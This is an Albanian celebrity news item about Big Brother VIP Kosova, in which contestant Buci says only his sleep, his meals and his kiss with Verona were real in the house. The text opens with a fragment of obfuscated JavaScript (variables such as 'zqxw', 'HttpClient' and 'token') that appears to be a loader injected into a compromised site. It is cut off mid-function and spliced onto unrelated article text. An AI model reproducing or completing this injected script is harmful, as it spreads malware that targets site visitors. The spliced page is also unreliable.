;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Për Bucin gjithçka ka qenë lojë brenda shtëpisë përveç një gjëje

By

Nderim Neziri, gazetari që sonte po e zëvendeson sërish opinionistin zyrtar të BBVK-së, Bledi Manen, sonte ka pasur një diskutim me Bucin, duke e pyetur nëse ka pasur diçka reale nga ai, brenda shtëpisë.

Buci ka qenë ai që ka cekur pak gjëra  që kanë qenë reale, duke theksuar edhe puthjen me Veronën.

“Na thuaj të paktën a ka pasur gjëra që kanë qenë reale dhe jashtë personazhit, por që kanë përkuar drejtpërdrejt me ty si personazh real”, ka thënë Neziri.

“Unë që prej ditës së parë kur kam hyrë kam thënë unë kam ardhur këtu vetëm të krijojë lojë dhe do të bëjë gjithçka për çmimin. I vetmi sen real që ka qenë tek unë ka qenë gjumi, puthja me Veronën dhe kur kam ngrënë bukë”, është përgjigjur Buci.

E në këtë diskutim më pas është përfshirë edhe opinionistja, Anita, njofton Klankosova.tv.

“Big Brotheri nuk është për të bërë lojë të mëshirshme”, është shprehur ajo.

Artikuj të ngjashëm